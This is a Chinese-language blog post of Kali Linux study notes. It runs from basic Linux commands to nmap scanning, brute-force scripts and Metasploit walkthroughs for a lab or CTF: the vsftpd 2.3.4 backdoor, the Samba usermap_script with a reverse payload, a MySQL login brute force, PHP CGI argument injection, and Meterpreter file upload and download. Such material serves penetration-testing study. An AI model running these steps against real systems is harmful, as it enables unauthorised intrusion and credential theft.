时人不识凌云木,直待凌云始道高。这篇文章主要讲述kali学习与指令总结相关的知识,希望能为你提供帮助。
常用文件修改指令
```1、复制命令 cp
用法:# cp 源文件/目标文件夹
将源文件复制到目标文件夹下 如:
cp 1.txt /root/2.txt
将1.txt文件复制到root目录下2.txt
cp -r 复制目录
【kali学习与指令总结】2、删除命令 rm
用法:rm 文件名
rm 1.txt 删除1.txt文件
rm - rf 强制删除文件夹
3、移动、重命名 mv
用法:移动, mv 原文件/目标文件夹
mv 1.txt /root/ 将1.txt移动到root目录下
4.touch user.txt创建user文件
## Linux用户新建
``` useradd -m username 更改用户名
passwdusername更改用户名的密码
adduser usename 添加用户名
passwd [用户名]更改密码
usermod -a -G sudo username -a仅和-G一块使用,将用户添加到附属组群。
CTRL+Z 强制退出msfconsole工具中
设置kali的ip地址
vim/etc/network/interfaces提取root权限
autoeth0 #开机自动激活
iface eth0 inet static #静态IP
address 192.168.1.1 #本机IP
netmask 255.255.255.0 #子网掩码
gateway 192.168.1.1 #网关
-------------------------------
/etc/init.d/networking restart 重启网卡服务
SSH远程连接服务
systemctl status ssh先查看开启或未开的状态
systemctl start ssh运行远程服务命令
systemctl enable ssh设置为开机自启的命令
vim /etc/ssh/ssh_config
vim是超级链接,etc目录vim前后必须加空格 vi是普通文本
login 登录 prohibit 阻止
permit root login : prohibit-password
不将上面的命令改为yes,只能用dcn用户登录
kali工具介绍
nmap工具的使用
nmap 识别活跃主机 (网络安全扫描)
1.列举网络主机清单
2.管理服务升级调度
3.监控主机
4.服务运行状况
nmap扫描端口状况
-Open(开放的):应用程序正在这个端口上监听连接
-Closed(关闭的):端口对探测做出了响应,但是现在没有应用程序在监听这个端口。
-Filtered(过滤的):端口没有对探测做出响应,但是现在没有应用程序在监听这个端口
-Unfiltered(未被过滤的):端口对探测做出来响应,但是Nmap无法确定它们是关闭还是开放。
-Open/Filtered:端口被过滤或者是开放的,Nmap无法做出判断。
-Closed/Filtered:端口被过滤或者是关闭的,Nmap无法做出判断。具体指令
指纹识别
nmap -sP//同于其他的扫描,他只扫描该网段下的端口,不是发现开放端口的
SYN半开放扫描
nmap -sS 1.1.1.1 tcp SYN Scan (sS)//这是一个基本的扫描方式,半开放式扫描因为这种技术使得 Namp不需要通过完整的握手能够获得远程主机的信息
nmap -sV 172.16.208.220 -ox 文件名.txt 将扫描的结果保存在文件名.txt(可以更换扫描方式)
nmap -v -sV 172.16.208.0/24 -oA subnet_1
nmap -sV//搜索服务版本信息
nmap -v//详细输出扫描情况
-oA//-oA将数据以图表的形式展现出来
subnet_1//子网的意思
sT TCP扫描
nmap -O 1.1.1.1//扫描目标操作系统
PN NO ping//扫描
nmap -O -PN 192.168.1.1/24
//如果远程主机有防火墙IDS和IPS系统你可以使用-PN命令来确保不ping远程主机因为有时候防火墙会组织掉ping请求,-PN命令 告诉Nmap不用ping远程主机
nmap -A OS//识别,版本探测,脚本扫描和traceroute综合扫描
NSE脚本扫描
nmap --script vuln <
target>
//(script这个文件名主要放置脚本)漏洞扫描
nmap --script=mysql-brute <
target>
// mysql爆破(p22为端口号)
nmap -p22 --script=ssh-brute 1.1.1.1//ssh爆破
nmap -p21 --script ftp-syst 1.1.1.1//ftp爆破
nmap -p 21 --script ftp-anon.nse -v 192.168.3.23//ftp-anon.nse 检查目标ftp是否允许匿名登录,光能登陆还不够,它还会自动检测目录是否可读写,比如你想快速批量抓一些ftp(视频上演示的是TCP)
nmap -sP 172.16.208.0/24//扫描该网段的主机信息
nmap -p 22-30 172.16.208.0/24//指定端口范围扫描该网段下的端口号
UDP服务
nmap -sU 1.1.1.1//用nmap扫描UDP服务
nmap -Pn//端口扫描
metasplit
在kali终端输入msfconsole在kali里搜索searchsploit(精确搜索)
在msf将kali搜索下的漏洞加以搜索
输入指令 use unix/irc...
info查找信息
set rhost IP地址
run 运行
whoami展示当前用户名
halt 立刻关机
reboot 立刻重启
back 返回msf工具metasplit meterpreter
Meterpreter是Metasploit框架中的一个杀手锏,通常作为利用漏洞后的进攻载荷所使用,双击载荷在触发漏洞后能够返回给一个控制通道
help:查看帮助信息
background:允许用户在后台Meterpreter会话
downland:允许用户从目标主机上下载文件
upload:允许用户上传文件到目标主机
shell:允许用户在目标主机上(仅是Windows主机)运行Windows shell命令
windows运行cmd命令 Linux运行daish
session -i:允许用户切换会话
ps:用于捕获目标主机正在运行的任务进程metasplit进行信息搜索(msf)
扫描内容/方法:
nmap -v -sV 网络/掩码 -oA 文件名称
nmap -sV 搜索服务版本信息
nmap -v 详细输出扫描情况
-oA -oA将数据以图表的形式展现出来
扫描数据处理:
cat subne_1.gnmap | grep 80/open | awk \'{print $2}\'
搜索这个文件中80端口的IP地址数
search portscan 端口扫描
cat /etc/passwd查找所有用户的列表
w 可以查找当前活跃的用户列表
cat /etc/group 查看用户组
userdel 用户 删除用户
userdel -f 连同用户目录一并删除FTP漏洞扫描
search vsftp
[vsftp]是FTPserver段上的服务[在2.3.4版本中有漏洞]
FTP漏洞扫描
search ftp_version 查找ftp版本{version版本}
use exploit/unix/ftp/vsftpd_234_backdoor 搜索mysql数据库
use auxiliary/scanner/mysql/mysql_login 进入这个目录
touch user.txt 生成一个user.txt
创建一个user.txt 写入用户
创建另一个pass.txt 写入密码(随便写入)
show options 显示配置
1.set rhosts 172.16.208.0
2.set threads 100 线程数为100 平时为单线程
3.setpass_user/home/dcn/pass/txt
4.setpass_FILE/home/dcn/pass/txt
mysql -h 172.16.208.0 -uroot -p
mysql -h 【-h选择主机】172.16.208.0-uroot 【uroot提示无密码】
有密码后面加 -p metasploit samba 漏洞
扫描端口
nmap -sV -p 139 445 IP地址 探测目标端口服务版本信息
进入msfconsole 搜索脚本
search samba
use exploit/multi/samba/usermap_script配置对应的payload show payloads
set payload cmd/unix/reverse
set lhost 172.16.208.220 输入本机ip metasploit 弱口令
nmap -sV 172.16.208.215 探测目标IP的端口
nc 172.16.208.215 1524 (1524为端口号)metasploit php cgi 漏洞利用
nmap -sV -p80 172.16.1.1
cd /usrshare/nmap/scripts 进入这个目录之后
ls | grep php-version 筛选搜索这个脚本
在kaili上输入或在msfconsole控制台输入
nmap --script http-php-version -p80 172.16.208.0 查找是否有符合的漏洞use exploit/multi/http/php_cgi_arg_injiection 进行漏洞利用
set rhost 172.16.208.1
exploit 之后进入meterperter会话
? 可以观看可执行操作
进入这个模式就可以查看目录获取flag值
background 切到后台
sessions 回到先前控制台
推荐阅读
- Nginx 反向代理工作原理简介与配置详解
- Nginx概述,搭建,配置实践总结
- 靶机DC-3
- 使用DockerNginx和Jenkins实现前端自动化部署
- 使用PetitPotam代替Printerbug
- LVS&Keepalived—集群负载均衡企业高可用详解
- 保护亿万数据安全,Spring有“声明式事务”绝招
- 分布式ID生成服务,推荐大家搞一个太香了
- 分布式技术带你分析认识缓存穿透/雪崩/击穿